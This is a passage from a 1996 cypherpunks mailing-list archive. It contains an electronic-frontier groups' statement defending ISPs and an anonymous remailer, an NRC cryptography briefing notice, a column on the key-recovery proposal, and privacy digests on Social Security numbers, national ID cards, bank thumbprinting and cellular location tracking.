(a full service site) and Johan Helsingius of anon.penet.fi (an anonymous
remailer) of involvement in the distribution of child pornography.  Why
were these accusations made? Demon UK had refused to remove a broad
range of sexually-oriented newsgroups identified by UK authorities as
possible sources of child pornography, and anon.penet.fi was identified
without substantiation as a source for `90% of child pornography on the
Internet.'

In fact, Demon UK was simply acknowledging that Internet Service
Providers (ISPs) cannot police the data that traverses their systems, or
assume responsibility for it, any more than the post office can assume
responsiblity for content that is sent through traditional mail.  And
Helsingius, contrary to allegations in the London Observer, had long before
restricted the size of files that could be transferred through anon.penet.fi,
effectively eliminating the possibility that binary files containing pictures
could be exchanged.

This story was extreme, but not without precedent: much has been written
associating the Internet with those who make and distribute child porn, and
there have been many attempts to hold ISPs responsible for objectionable or
illegal content.

ISPs are not content providers; they channel content provided by their users.
It is outside the scope of the ISP to monitor, evaluate, and attempt to remove
objectionable content. In fact, any attempt by an ISP to block particular
kinds of content will ultimately be fruitless, as providers of that content
will simply find alternate channels of distribution.

Moreover, it is wrong to assume that the Internet has no rules, and is
friendly to the exchange of objectionable materials.  In fact the Internet is a
`virtual community' of users with a distinct culture incorporating  diverse
views but finding consensus in opposition to censorship and access control.
There is also strong opposition to the exploitation of children; in fact, many
Internet users have cooperated in attempts to identify those who create and
distribute child pornography.

Summary: The physical abuse and exploitation of children is a very real
problem demanding a proactive response, however we vigorously oppose
attempts to  stifle the free and open exchange of information over the
Internet in the mistaken belief that overbroad restrictions on the flow of
information will protect children from abuse.  We support Demon UK and
anon.penet.fi
(which Helsingius has shut down), and deplore the Observer's lurid attempt
to make respectable Internet providers the "cause" of a problem for which
they have no responsibility.

The Observer story is not the first of its kind: it represents an ongoing
confusion about a complex new medium.  Unfortunately this
misunderstanding has become a global problem, represented in proposed or
enacted restrictive legislation as well as negative press.

Consider these possible analogies to the Internet:

- The Internet is a vast mail system, like a post office.  Would you favor a
  law that required postal authorities to open each piece of mail and
  evaluate its acceptability?

- The Internet is a huge library system.  Would you favor a law that
  would restrict information a library can provide?

- The Internet is a collection of virtual communities. Would you favor a
  law that required routine searches of your community?

Our position: These measures constrain everyone because of the misdeeds
of a few. It is more sensible to find and deal with the sources of child
pornography than to impede the flow of data over the Internet. The
imposition of censorship and additional constraints applied to ISPs will not
solve the existing problem, but will create a new problem, a barrier to the
free and democratic exchange of ideas.

For background on global privacy and liberty issues:
  http://www.eff.org/~declan/global/

For press contacts, and for more information about the Internet, see
homepages for the signatories to this message:

ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei.html
CITADEL - Electronic Frontier France * pforsans@in-net.inba.fr
CommUnity (UK) * http://www.community.org.uk
EFF (USA) * http://www.eff.org
EFF-Austin (USA) * http://www.eff-austin.org
Electronic Frontier Canada * http://www.efc.ca/
Electronic Frontiers Australia * http://www.efa.org.au/
Electronic Frontiers Houston (USA) * http://www.efh.org
Elektronisk Forpost Norge (Electronic Frontier  Norway) *
   http://www.sn.no/~efn
Fronteras Electronicas Espan~a (Electronic Frontiers Spain) *
   http://www.lander.es/~jlmartin/
HotWired * http://www.hotwired.com/

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Sat, 7 Sep 1996 09:11:19 +0800
To: crypto@nas.edu
Subject: Public briefing on the NRC cryptography policy report at...
Message-ID: <9608068420.AA842055531@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject:
Public briefing on the NRC cryptography policy report at MIT on Sept 11

  Cryptography's Role in Securing
  the Information Society
  
  
  A Public Briefing in Cambridge, Massachusetts
  Wednesday, September 11, 1996, 3:00-4:00 pm
  
  There will be a public briefing in Cambridge, Massachusetts by the
            National
  Research Council on this report.  The briefing will be held at the
            Laboratory
  of Computer Science, MIT, Room NE43-518, 545 Technology Square, in
  Cambridge (off Main Street).  Dr. Herbert Lin, study director for this
            report
  and senior staff officer of CSTB, will conduct the briefing.  For further
            information,
  please contact Ron Rivest at (617) 253-6098 or rivest@theory.Ics.mit.edu.

  Pls post.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Sat, 7 Sep 1996 09:22:38 +0800
To: cypherpunks@toad.com
Subject: DC lock and key, from HotWired
Message-ID: <v01510110ae56579a5702@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain




http://www.hotwired.com/muckraker/

Muckraker
By Brock Meeks

More DC Lock and Key


                The Clinton administration will unveil new encryption
                legislation, dubbed the Key Recovery Initiative, as early
                as 9 September, Muckraker has learned.

                The bill's title is an exercise in Orwellian redirection
                - nothing more than an attempt to make the threadbare
                "key escrow" encryption concept, which was spawned via
                the infamous Clipper Chip, more vanilla-sounding.

                The Key Recovery Initiative is political hardball,
                calculated to split an industry currently reluctant to
                bow to pressure from the FBI and the National Security
                Agency to voluntarily adopt the key escrow encryption
                scheme. In making its pitch, the White House is "offering
                some sweetheart deals to a number of companies," says an
                industry source familiar with the administration
                proposal.

                Those "sweetheart deals" involve relaxing export controls
                on encryption software only for certain industries -
                finance, insurance, and health care, industry sources
                say. Such a move essentially leaves companies such as
                Netscape isolated. It's a classic divide-and-conquer
                strategy.

                In return for relaxing the export controls, the White
                House will ask companies in the targeted industries to
                provide concrete assurances that they will endorse a
                government-devised system of "key recovery encryption" in
                which the decoding keys to any scrambled data are turned
                over to a "trusted third party." Those third parties, of
                course, must first be verified and approved by the
                government via as yet undefined criteria. The decoding
                keys made available under this plan would be accessible
                to any law enforcement agency that could prove to a judge
                that it needed them to carry out an investigation. If
                that ambiguous level of "proof" can be provided, your
                keys are handed over without debate or recourse on your
                part.

                The administration's legislation will propose a
                "framework" based on "a global key management
                infrastructure," according to a little-publicized
                statement released by the White House on 12 July. A
                spokesperson from the vice president's office confirmed
                that the legislation will be drawn from this outline.

                The bill is an attempt to forge alliances with US trading
                partners so that data can be accessed and decoded across
                international borders.

                The legislation's blueprint includes:

                - Liberalizing export controls for encryption products
                dealing with financial, insurance, and health-care data.

                - A standards-setting procedure for "key recovery systems
                and products" that will be "eligible for general export
                licenses," and standards for products that the government
                will buy.

                - Transfer of export control oversight from the State
                Department, which currently maintains that encryption
                technology is a "munition," to the Commerce Department.


[...]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 7 Sep 1996 10:13:48 +0800
To: cypherpunks@toad.com
Subject: More identification laws
Message-ID: <01I960QKGRV49JDL62@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu"  2-SEP-1996 22:33:17.31

[The new welfare bill in the US has profound privacy implications and
will require major new identification systems and databases.  See the
article on the front page of today's (9/2/96) New York Times for some
details.  (There's a bunch of useful Internet stuff in the business
section too.)  This issue of the Privacy Forum, which I've abridged
and rearranged, includes three items on Social Security Numbers and
another on fingerscanning.  This is really it: pressures for universal
identifiers are growing exponentially from a hundred directions as we
speak.  I wish I knew how to communicate the magnitude of it.  If half
the stuff currently being launched in this area really happens then
the world is going to be completely different a year from now -- give
it two if the system development projects choke as per usual on their
overambition.  I hope you're not sick of this topic, because you'll
be hearing lots more about it this autumn.  Educate, agitate, organize.
Please.  Speaking of which, I've also enclosed a note about a Privacy
International web page on national identification cards.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Sun, 1 Sep 96 18:14 PDT
From: privacy@vortex.com (PRIVACY Forum)
Subject: PRIVACY Forum Digest V05 #16

PRIVACY Forum Digest       Sunday, 1 September 1996       Volume 05 : Issue 16

----------------------------------------------------------------------

Date:    Fri, 30 Aug 1996 10:51:45 -0700 (PDT)
From:    jd@scn.org (Janeane Dubuar)
Subject: NCSL ALERT: Driver's Licenses and Birth Certificates

This alert came by mail from the National Conference of State Legislatures
in Washington, D.C.  I added an update which includes the names of
House-Senate conferees.  The federal immigration bill (H.R. 2202) is
expected to emerge from conference committee some time during the first
week of September.  Now is the time to act. 

TOWARD A NATIONAL IDENTIFICATION CARD AND MORE RED TAPE:
CONGRESS MANDATES CHANGES TO DRIVER'S LICENSES AND BIRTH CERTIFICATES

On May 2, 1996, the U.S. Senate passed S. 1664 (now called H.R. 2202 -
Senate version), a bill to reform illegal immigration, that proposes
monumental changes to all driver's licenses and birth certificates
(section 118).  These changes will force most U.S. citizens to obtain and
pay for new driver's licenses and birth certificates; compromise each
citizen's right to privacy; violate state and local control over driver's
licenses and birth certificates; and invite discrimination against
minorities.  The Congressional Budget Office estimates that the federal
driver's license mandate alone will shift up to $20 million in costs to
states and localities.  The House also passed an immigration bill, H.R.
2202.  The House bill does not contain the driver's license and birth
certificate mandates.  Both House and Senate immigration staff are
currently reconciling the two bills in an informal conference committee. 
Phone calls to House and Senate Leadership are urgently needed to demand
that the driver's license and birth certificate mandates be deleted from
the final bill. 

What Does the Senate Version of H.R. 2202 Require?

1.  Driver's Licenses  -  State driver's licenses and identification cards
MUST CONTAIN THE APPLICANT'S SOCIAL SECURITY NUMBER.  The federal
government will also create new federal standards for the application
process and design of all driver's licenses and ID cards.  States that
currently retain and verify an applicant's social security number but do
not place the number on the cards are initially exempt from the social
security number mandate.  According to the American Association of Motor
Vehicle Administrators, of the 38 states that do not require the social
security number to be on their driver's licenses, only Massachusetts would
qualify for this exemption; all other states would be required to place
social security numbers on driver's licenses and ID cards.  All states are
required to conform to the other federal standards.  States with cycles of
renewal longer than six years must start October 1, 2006.  After October
1, 2006, NO ONE may use a driver's license or ID card for identification
purposes that does not meet these federal standards. 

2.  Birth Certificates  -  All birth certificates must be printed on
federally-approved safety paper and be certified by the issuing agency.
The federal government will also issue additional provisions requiring
other security features in the future.  Starting in 1999 (three years
after the bill's enactment), birth certificates that do not meet these
federal standards cannot be accepted by any federal agency or by any state
or local agency that issues driver's licenses or ID cards. 

Who Needs a New Driver's License?

Anyone who wants to use their driver's license as a valid form of 
identification after October 1, 2006.  If you need to use a driver's 
license to vote, to apply for a passport, to qualify for a federal school 
loan, license, contract or public assistance program or to meet any other 
federal, state or local requirement you will need a new driver's license.

Will I Have to Put My Social Security Number on My Driver's License?

Yes.  While most states currently give applicants the option of not using 
this number on their driver's license or prohibit its use outright, the 
new federal requirements will force almost every American to put their 
social security number on their license or ID card.  Many citizens are 
concerned by laws that increase the circulation of their social security 
number.  The social security number is a key which provides access to 
vital personal information, which could be misused if it fell into the 
wrong hands.  Others believe that proposals making driver's licenses 
uniform, including social security numbers, are a significant step toward 
a national ID card.  Finally, many minorities contend that they will be 
disproportionately affected by the new requirements because they will be 
asked to show their documents more often than other Americans.

Who Needs a New Birth Certificate?

Anyone who wants to use their birth certificate as a valid form of 
identification after October 1, 1999.  If you need to use your birth 
certificate to establish citizenship, apply for or renew a driver's 
license, passport or other identification documents, obtain a marriage 
license, register to vote, change your name, or many other purposes you 
will need a new certificate.  No matter how old you are, if you need to 
use your birth certificate it must conform to the new federal standards, 
otherwise it is invalid.  Fees will almost certainly be charged for new 
birth certificates to pay for the new federal requirements.  This will 
impose a significant hardship on elderly and low-income Americans.


THE DRIVER'S LICENSE AND BIRTH CERTIFICATE MANDATES IN ILLEGAL 
IMMIGRATION BILL H.R. 2202 (Senate) WILL...

...INCREASE SOCIAL SECURTY NUMBER FRAUD.  H.R. 2202 (Senate version) 
will require the vast majority of automobile drivers in the U.S. to put 
their social security numbers on their driver's licenses.  In the future, 
whenever someone shows their driver's license they will also be exposing 
their social security number.  With the social security number accessible 
to so many people, it will be relatively easy for someone to fraudulently 
use your social security number to assume your identity and gain access 
to your bank account, credit services, utility billing information, 
driving history, and other sources of personal information.  This new 
federal law will compound and exacerbate a disturbing trend reported by 
banks and credit card companies that social security number-related fraud 
is already on the rise.

...INVADE PRIVACY AND THREATEN CIVIL LIBERTIES.  According to the 
Privacy Rights Clearinghouse, when social security numbers were first 
issued in 1936, the federal government assured the public that use of the 
numbers would be limited to social security programs.  The driver's 
license and ID card provisions in H.R. 2202 (Senate version) violate this 
promise, and will dramatically increase the circulation of the social 
security number and its use as a national identifier.  Now more 
corporations, creditors, insurance companies, government officials and 
others will be able to get easier access to vast amounts of personal 
information that can be used to support marketing schemes, determine 
insurance and loan eligibility, gain an advantage in a lawsuit, etc.

...PREEMPT STATE LAWS AND SHIFT COSTS TO STATES AND LOCALITIES.  According
to the Automobile Association of America, 38 states do not require drivers
to put their social security numbers on their driver's licenses. 
Legislation has been introduced in a number of states (including
Mississippi and Hawaii) that require social security numbers on their
driver's licenses to take the numbers off the card because of fraud and
privacy problems.  The new federal law would require all but Massachusetts
to change their laws, taking this option away from the majority of the
nation's drivers and limiting state authority to decide whether this
policy is appropriate for their residents.  The bill also gives the
federal government wide latitude to develop new and more costly
requirements for state driver's licenses, ID cards and birth certificates
in the future.  According to the Congressional Budget Office, the new
unfunded federal mandates in the law will shift up to $20 million in costs
to states and force states and localities to increase fees for birth
certificates to pay for new federal requirements. 

...LEAD TO A NATIONAL ID CARD THAT DISCRIMINATES AGAINST MINORITIES.  By
requiring states to tie the social security number to state-issued
identification documents, the proposal marks a dramatic shift toward using
the number as an identifier.  Today's mandate that the states follow
federal requirements in their identification documents will lead to
tomorrow's mandate:  that the federal government issue the identification
documents itself to ensure uniformity and reliability.  Make no mistake:
this provision is a key building block for national identification
documents, and the national ID card.  If such an ID card is mandated,
Latinos, Asians, and other Americans who "look foreign" or speak with an
accent will be expected to produce this document far more often than other
Americans, especially if they live in border areas.  Increasing
discrimination against our own citizens is no way to deal with the problem
of illegal immigration. 

...TANGLE CITIZENS IN GOVERNMENT RED TAPE.  The federal bill requires any
citizen that needs to use their birth certificate for official
identification to get a reissued birth certificate from their place of
birth by October 1999.  Senior citizens that intend to apply for Medicare
will need to obtain a new birth certificate.  Couples engaged to be
married will need new birth certificates for a marriage license and to
change their names.  Professionals traveling internationally for business
or families going on vacation overseas will need new birth certificates to
obtain passports.  With millions of citizens requesting new birth
certificates, lines and waits for federally-approved birth certificates
will be long.  All recipients will be charged a fee for their new birth
certificates. 
		      -------------------------------

UPDATE:  To study the full text of the Senate's version of H.R. 2202, go
to http://thomas.loc.gov and look up S.1664, section 118.  Write or call
conferees and your own member of the House.  As of Thursday, 8/29/96, 4:30
pm EDT, Senate conferees on the immigration bill were: 

Feinstein, Dianne - California 
Grassley, Chuck - Iowa 
Hatch, Orrin - Utah
Kennedy, Edward - Massachusetts 
Kohl, Herb - Wisconsin 
Kyl, Jon - Arizona
Leahy, Patrick - Vermont 
Simon, Paul - Illinois 
Simpson, Alan - Wyoming
Specter, Arlen - Pennsylvania 
Thurmond, Strom - South Carolina

Likely House conferees include:

Becerra, Xavier - California (30)
Berman, Howard - California (26)
Bono, Sonny - California (44)
Bryant, Ed - Tennessee (7)
Bryant, John - Texas (5)
Conyers, John, Jr. - Michigan (14)
Frank, Barney - Massachusetts (4)
Gallegly, Elton - California (23)
Goodlatte, Bob - Virginia (6)
Hyde, Henry - Illinois (6)
McCollum, Bill - Florida (8)
Smith, Lamar - Texas (21)

Please do not wait to contact House conferees.  The conference report 
could be issued within as little as 24 hours of their final selection.

To be most effective, letters should be postmarked by Saturday, August
31st, or faxed early the following week.  Members' offices also may be
reached by phone through the Capitol Switchboard (202) 224-3121. 
Thanks for your help.

------------------------------

Date: Fri, 16 Aug 96 15:24 EST
From: Robert Ellis Smith <0005101719@mcimail.com>
Subject: Alternatives to Social Security Numbers

   [ From Risks-Forum Digest; Volume 18 : Issue 35  -- MODERATOR ]

Last spring, I asked readers of RISKS for suggestions on alternatives to
Social Security numbers in organizations with large data bases of
information about individuals.  Many such organizations find they do not
need to use SSNs, and avoid privacy problems associated with using them.
For a copy of all of the responses, send a request to us and specify whether
you want hard copy or electronic edition of our August issue, and provide
postal address or e-mail address.

Robert Ellis Smith, Publisher, Privacy Journal newsletter,
Providence, RI, 401/274-7861, e-mail 5101719@mcimail.com.

Excerpts from the suggestions follow:

* FROM WASHINGTON, D.C.: Maryland uses Soundex (of name and birth date
concatenated [linked in a chain]) both for driver and vehicle registrations.

* FROM CAMBRIDGE, MASS.: "Against Universal Health-Care Identifiers" in the
JOURNAL OF THE AMERICAN MEDICAL INFORMATICS ASSOCIATION 1:316-319, 1994, by
Dr. Peter Szolovits of MIT and Dr. Isaac Kohane of Children's Hospital in
Boston, discusses a number of ways in which cryptography- based health care
identifiers can be used to preserve privacy while remaining manageable for
typical medical purposes.  This is publication #49 (in Postscript format) at
http://medg.lcs.mit.edu/people/psz/publications.html.

* FROM YARDLEY, PA.: One way is to use a simple scheme like three letters
from last name, the first initial, and some digits; another is just to use
sequential numbers.  Another is an MD5 hash of the full-name string [a
one-way mathematical function as a stand-in for the name that makes
translation back to the original name impossible].  This is always unique
for a unique string, so you might need to add some numbers.

* FROM MADISON, WISC.: When I was working on the development of the
Wisconsin Student Data Handbook - we tried to develop
 what we called an "SSN surrogate," also of nine bytes per
individual.  It involved an algorithm which combined year,
month, and date of birth with sex and two consonants each
 extracted from the first and middle names.

* FROM CYBERSPACE: I worked with a banking software company that set up
employee records simply by exact hire date and time.  Since they never hired
anyone at exactly the same time, it gave each person a unique number.  You
could do the same for any data base in which records are added gradually one
at a time - just number them based on exact date and time added.

* FROM PALO ALTO, CAL.: At Stanford University we made a decision long ago
not to use SSN for identification except where required by law (payroll
taxes, for example).  We use a unique Stanford University ID (SUID), which
is a lifetime number and applies to all students, alumni, faculty, staff,
and patients.  It serves all the same purposes that the SSN would do if it
were used.  

------------------------------

Date:    Sat, 24 Aug 1996 00:25:15 -0400
From:    Monty Solomon <monty@roscom.COM>
Subject: SSN and Welfare Legislation

Excerpt from EPIC Alert 3.15

=======================================================================
[3] Welfare Legislation Signed by Clinton
=======================================================================

On August 22, President Clinton signed the Personal Responsibility and
Work Opportunity Reconciliation Act of 1996. The bill includes a
number of sections that expand the use of the Social Security Number
and create new databases of personal information.

The bill requires that states obtain individuals' Social Security
Numbers for many state documents.  It provides that on "any
application for a professional license, commercial driver's license,
occupational license, or marriage license [the SSN] be recorded on the
application."

The new bill also creates a national database of every employee in the
United States.  States are also required to create databases of "new
hires."  The state databases would be uploaded to a federal registry
and the Social Security Administration would verify the SSNs.  The
Commissioner of Social Security is required to develop "a prototype of
a counterfeit-resistant social security card" made of tamper proof
materials for proving citizenship, and to issue a report on the cost
of issuing a new card to all citizens over a three, five or ten year
period.

More information on the welfare bill, the Social Security Number, and
efforts to expand its use is available at:

     http://www.epic.org/privacy/ssn/

------------------------------

Date:    Fri, 30 Aug 1996 10:34:03 -0700 (PDT)
From:    jd@scn.org (Janeane Dubuar)
Subject: fingerprinting by banks

SEATTLE WEEKLY

Copyright 1996 - used with permission

July 24,1996  -  "Quick and Dirty"
column by Eric Scigliano

Thumbprint, retinal or body-odor scan, sir?

If you think those "Go to Jail" charity slumber parties are a scream, you 
may get a kick out of cashing checks after September 11.  That's when US 
Bank will start requiring that non-customers cashing its checks consent 
to be finger--or, rather, thumb--printed.  Other local banks are expected 
to join US Bank on the new security frontier in September, and at least 
one, Seafirst, plans to start taking thumbprints next year in step with 
its California parent, Bank America.  The thumbprinting scheme is being 
pushed by the Washington Bankers Association, which wants all its members 
to take the plunge together.  As Dan Doyle, regional manager over US 
Bank's Western Washington branches, notes, "I'm not sure any one bank 
wants to be the one to step out and do it--it probably sounds cold, hard, 
and not very customer-friendly."  Indeed.  "But it's really to protect 
customers."

That protection is supposed to come from deterrence.  Very few, if any, 
check forgers actually get caught via thumbprints in those states (most 
notably Texas, Nevada, and Arizona) whose banks already take them.  
Tellers can't (yet, anyway) check the prints for known forgers; the 
prints will merely be saved (on the checks themselves) for investigation 
in the event of a bounce.  But Bruce Koppe, the Bankers Association's 
executive director, reports that bogus-check losses have declined by 40 
percent in those states.  Doyle says US Bank has charted 45 percent 
reductions in states where it's tried the system, and fewer than 1 
percent of those asked decline to give prints.  Some retailers, and 
reportedly at least one local credit union, are already taking prints on 
checks.  

Customers can at least be reassured that they won't have to bear the 
telltale black stains of traditional fingerprinting; the new "inkless"  
printing leaves no visible mark on the skin.  Still, fingerprinting is, 
in the words of American Civil Liberties Union lobbyist Jerry Sheehan, 
"the archetypal metaphor of criminality, along with the mug shot and 
lineup."  Some tellers are already grumbling at the prospect of having to 
do it.  The banks take heart that they won't be demanding prints of their 
current customers.  But the ill will may still come around to bite them; 
those are all potential customers they stand to infuriate, and 
account-holders may not like the idea of their checks being valid only 
when backed by thumbprints.

And thumbprinting may be just the nose under the tent.  That mixed bodily 
metaphor suits the brave new world of "biometric" identification in which 
we will, very soon, find ourselves.  Down in Olympia, a working group of 
the joint Legislative Transportation Committee is considering what kind 
of biometric and/or computer technology to adopt in upcoming "smart" 
driver's licenses; its findings are due in December, preparatory to the 
next legislative session.  Possibilities include a bar code or magnetic 
strip; a store scrutinizing your check or a cop writing a ticket could 
scan your full digitalized profile.  All the drivers' license data that 
now fills a state warehouse could be consolidated in a single data base.  
And all those sci-fi and privacy-protectionist warnings about personal bar 
codes and instant snooping will come true.  

Transportation Committee staffer Jennifer Joly says that fingerprinting 
is still the most common form of biometric ID.  But more exotic 
techniques are coming in: hand geometry scans, retinal scans, iris scans, 
computerized facial recognition, and (I am not making this up) body odor 
measurement.  It seems unlikely that those who take IDs will stop at 
thumbprinting checks.  Joly reports that bankers, retailers, and 
law-enforcement groups have joined in a coalition to weigh in on the new 
drivers' licenses.

"We'll be pushing for legislation imposing severe restrictions" on 
fingerprinting, the ACLU's Sheehan vows.  And they'll "continue to resist 
these pressures to create uniform identification papers from a document 
intended for driver's certification." [...]

July 31, 1996  -  "Quick and Dirty"
column by Eric Scigliano

[...]
They want to know it all

If you feel queasy about being fingerprinted by a bank, imagine how 
tellers feel about all the information they're supposed to disclose.  US 
Bank asks employees to fill out an "extortion readiness card" listing all 
their cars (by number and "markings") and neighbors, the names, schools, 
and daily routes and schedules of their children, and any meetings they 
themselves regularly attend.  US Bancorp spokeswoman Mary Ruble says 
taking such data is a longtime standard banking practice done for the 
employees' "own safety," to protect them in "hostage situations" and to 
help authorities "follow up if a claim of kidnapping is made."  She adds 
that US Bank has never encountered such a situation, but believes other 
banks have.  The cards are kept confidential in a central office, and 
filling them out is "voluntary for employees."  But one bank worker who 
objected recalls being told to fill out the card anyway, and got the 
feeling, despite the explanation, that the intent was really to guard 
against crimes by, rather than against, employees.  "The extortion 
readiness card has nothing to do with embezzlement," says Ruble.

-----------------------------------------------------------------------------

The Internet PRIVACY Forum is a moderated digest for the discussion and
analysis of issues relating to the general topic of privacy (both personal
and collective) in the "information age" of the 1990's and beyond.  The
moderator will choose submissions for inclusion based on their relevance and
content.  Submissions will not be routinely acknowledged.

All submissions should be addressed to "privacy@vortex.com" and must have
RELEVANT "Subject:" lines; submissions without appropriate and relevant
"Subject:" lines may be ignored.  Excessive "signatures" on submissions are
subject to editing.  Subscriptions are by an automatic "listserv" system; for
subscription information, please send a message consisting of the word
"help" (quotes not included) in the BODY of a message to:
"privacy-request@vortex.com".  Mailing list problems should be reported to
"list-maint@vortex.com". 

All messages included in this digest represent the views of their
individual authors and all messages submitted must be appropriate to be
distributable without limitations. 

The PRIVACY Forum archive, including all issues of the digest and all
related materials, is available via anonymous FTP from site "ftp.vortex.com",
in the "/privacy" directory.  Use the FTP login "ftp" or "anonymous", and
enter your e-mail address as the password.  The typical "README" and "INDEX"
files are available to guide you through the files available for FTP
access.  PRIVACY Forum materials may also be obtained automatically via
e-mail through the listserv system.  Please follow the instructions above
for getting the listserv "help" information, which includes details
regarding the "index" and "get" listserv commands, which are used to access
the PRIVACY Forum archive.  

All PRIVACY Forum materials are available through the Internet Gopher system
via a gopher server on site "gopher.vortex.com".  Access to PRIVACY Forum
materials is also available through the Internet World Wide Web (WWW) via
the Vortex Technology WWW server at the URL: "http://www.vortex.com";
full keyword searching of all PRIVACY Forum files is available via
WWW access.

------------------------------

End of PRIVACY Forum Digest 05.16
************************



Date: 2 Sep 1996 13:52:18 -0500
From: "Dave Banisar" <banisar@epic.org>
To: "Interested People" <interest@epic.org>
Subject: National ID Card Web Pages


         EXTENSIVE NATIONAL ID CARD WEB SITE IS NOW ON LINE


The London-based human rights watchdog Privacy International (PI)
has just opened an extensive web page on National ID cards. The
initiative comes in the wake of pending efforts in the United
States, Canada and United Kingdom to implement national ID card
systems.

The page contains a 7,000 word FAQ (Frequently Asked Questions) on
all aspects of ID cards and their implications. Also included in the
PI documents is a paper describing successful campaigns opposing to
ID cards in Australia and other countries.  The page also has links
to numerous other sites and documents.

PI Director Simon Davies said he hoped the page would help promote
debate about the cards, "ID cards are often introduced without
serious discussion or consultation. The implications are profound,
and countries planning to introduce them should proceed with
caution."

"The existence of a card challenges important precepts of individual
rights and privacy. At a symbolic and a functional level, ID cards
are often an unnecessary and potentially dangerous white elephant.
They are promoted by way of fear-mongering and false patriotism, and
are implemented with scant regard for serious investigation of the
consequences." he said.

The URL is :

   http://www.privacy.org/pi/activities/idcard/

PI has also set up an auto response function for the FAQ document.
Its address is: idcardfaq@mail.privacy.org

Privacy International is an international human rights group
concerned with privacy and surveillance issues. It is based in
London, UK. For further information contact the Privacy
International Washington Office at +1.202.544.9240 or email
pi@privacy.org. PI's web page is available at:
http://www.privacy.org/pi/


_________________________________________________________________________
Subject: National ID Card Web Pages
_________________________________________________________________________
David Banisar (Banisar@privacy.org)     *  202-544-9240 (tel)
Privacy International Washington Office *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.privacy.org/pi/
Washington, DC 20003                   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Sat, 7 Sep 1996 08:55:26 +0800
To: cypherpunks@toad.com
Subject: Muckraker column
Message-ID: <v01510111ae56588d903d@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Not sure it came through in my cut-and-paste, but the Muckraker column is
of course by Brock Meeks and went up on the site today.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 7 Sep 1996 09:26:37 +0800
To: stewarts@ix.netcom.com
Subject: Re: Whistleblowing on the Internet
Message-ID: <01I960XGNBDW9JDL62@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart"  3-SEP-1996 06:43:40.27

	I would note that most unions are mostly run by populists of
various varieties, who are generally against individual liberties - whether
liberal or conservative populist doesn't make any real difference in the
long run. To me, Pat Buchannan and Adolf Hitler look rather similar.

>While some unions are clearly run by and for thugs, some employers have
>also hired thugs to attack union organizers, and both unions and employers
>have convinced government thugs to attack their opponents, though unions
>generally have convinced governments to write laws with fines attached,
>while employers have often had actual Federal troops shooting union strikers,
>and have had police refrain from defending strikers from attack.

	I object to union members getting beaten up for union membership,
striking, etcetera, just as much as I object to members of any other
non-governmental organization being beaten activity. But there's a
difference between the right not to get beaten up and someone claiming that
union membership - still less not working - isn't a perfectly legitimate
reason for firing someone. The state should not be interfering in this
matter, in either direction.

>In a free market, there wouldn't be laws requiring or forbidding union
>membership, and some unions would prosper by providing good service to their
>members and to the employers that hire them, while others wouldn't.

	Quite.... but unions that survive under a free market will look a
_lot_ different from today's unions.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 7 Sep 1996 09:17:46 +0800
To: cypherpunks@toad.com
Subject: Cellular phone tracing
Message-ID: <01I96117UUVI9JDL62@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	From comp.risks:

Date: Mon, 2 Sep 1996 22:24:13 -0400 (EDT)
From: glassman@sunsite.unc.edu
Subject: FedEx monitoring of cellular phonecall locations

[...] nowhere near either of those places, so I did not bother to mention my
current location to the operator. The next day, Saturday, I called FedEx
with the same cell phone from Blowing Rock to arrange the pickup. The
operator immediately asked if I wanted them to come to the intersection that
I had placed my call from the day before.

Two days later, a FedEx operator confirmed that they are getting "new
systems" at some locations that are able to record the locations from which
cellular calls are placed.

I have now asked Cellular One three times to explain to me why they do not
tell subscribers that they pass this location information through the
system, but to no avail. [...]

========== end fwd.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 7 Sep 1996 09:35:25 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 5 Sep 1996
Message-ID: <01I961B37F9U9JDL62@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu"  5-SEP-1996 22:55:23.70

>************************************************************
>Edupage, 5 September 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>************************************************************

[...]

>AOL BLOCKS JUNK MAIL SITES
>America Online is blocking all electronic mail sent from five Internet sites
>that have been used to send hundreds of thousands of unsolicited messages to
>AOL customers.  In turn, Cyber Promotions Inc., which is associated with
>three of the sites, has accused America Online of hypocrisy for "censoring"
>commercial messages sent from other sites but allowing AOL itself to sponsor
>commercial promotions.  AOL dismisses the charge as an "apples and oranges
